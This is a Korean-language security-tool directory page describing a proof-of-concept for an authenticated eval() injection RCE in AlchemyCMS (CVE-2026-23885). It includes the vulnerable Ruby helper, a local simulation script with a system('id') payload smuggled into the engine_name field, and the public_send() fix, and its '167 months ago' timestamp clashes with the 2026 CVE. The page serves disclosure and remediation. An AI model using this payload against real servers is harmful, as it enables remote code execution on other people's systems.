Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/thedeepopc/cve-2026-23885
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubthedeepopc/cve-2026-23885

CVE-2026-23885

# CVE-2026-23885에 대한 개념 증명 익스플로잇 AlchemyCMS의 eval() 주입을 통한 인증된 RCE로, 기술 분석 및 수정 지침을 포함합니다.

저장소 보기
167개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

보안 권고: CVE-2026-23885

AlchemyCMS의 인증된 원격 코드 실행(RCE) 취약점

1. 요약

AlchemyCMS 프레임워크에서 동적으로 평가되는 코드의 지시문 부적절한 중화(CWE-95) 와 관련된 심각한 보안 취약점이 발견되었습니다. 이 취약점은 관리자 권한을 가진 인증된 사용자가 eval() 주입 지점을 통해 호스트 서버에서 임의의 Ruby 코드와 시스템 명령을 실행할 수 있게 합니다.


2. 기술적 취약점 분석

취약 구성 요소

  • 파일: app/helpers/alchemy/resources_helper.rb
  • 메서드: Alchemy::ResourcesHelper#resource_url_proxy
  • 위험 수준: 중간/높음 (인증된 RCE)

근본 원인

헬퍼 메서드는 resource_handler 객체의 engine_name 속성을 안전하지 않게 처리합니다. 이 속성은 사전 검증이나 유효성 검사 없이 Ruby 함수에 직접 전달됩니다.

eval()
root@kitploit:~
def resource_url_proxy(resource_handler)
  if resource_handler.in_engine?
    eval(resource_handler.engine_name) # rubocop:disable Security/Eval
  else
    main_app
  end
end

# rubocop:disable Security/Eval 지시문의 존재는 eval() 사용의 보안 영향이 인지되었지만 구현 중에 우회되었음을 확인시켜 줍니다.

3. 개념 증명(PoC)

공격 벡터

이 취약점은 리소스 기반 뷰(예: 사이트 또는 언어)를 렌더링할 때 AlchemyCMS 관리 인터페이스 내에서 트리거됩니다. 공격자가 모듈 구성을 조작하거나 기본 리소스 데이터를 변조할 수 있다면 코드 실행을 달성할 수 있습니다.

독립 실행형 악용 스크립트

다음 스크립트는 취약한 헬퍼 환경을 시뮬레이션하여 임의 코드 실행을 시연합니다:

Ruby

root@kitploit:~
require 'ostruct'

def resource_url_proxy(resource_handler)
  if resource_handler.engine_name && !resource_handler.engine_name.empty?
    eval(resource_handler.engine_name)
  end
end

# 페이로드: 시스템 'id' 명령을 실행하고 증거 파일을 생성합니다
payload = "system('id > /tmp/rce_verified'); 'main_app'"
handler = OpenStruct.new(engine_name: payload)

resource_url_proxy(handler)

실행 증거

실행 시 시스템 명령이 처리되어 공격자에게 서버 환경에 대한 접근 권한을 부여합니다.

RCE 터미널 증거

4. 영향 및 심각도

  • 기밀성: 높음. 애플리케이션 데이터 및 환경 비밀에 대한 완전한 접근.
  • 무결성: 높음. 파일 및 데이터베이스 레코드 수정 가능.
  • 가용성: 높음. 완전한 시스템 중단 가능성.
  • CVE ID: CVE-2026-23885

5. 해결 방안

이 취약점은 다음 패치 버전에서 해결되었습니다:

  • 7.4.12
  • 8.0.3

수정 사항은 eval() 호출을 public_send()로 대체하여 요청을 의도된 엔진 프록시로 안전하게 라우팅합니다:

Ruby

root@kitploit:~
main_app.public_send(resource_handler.engine_name) if resource_handler.engine_name.present?
취약점 발견: 독립 보안 감사

CVE 참조: CVE-2026-23885

  • CVE 목록: CVE.org의 CVE-2026-23885
  • 취약점 분석: Tenable CVE-2026-23885 데이터베이스
  • AlchemyCMS 보안 정책: 보안 지침
도구 다운로드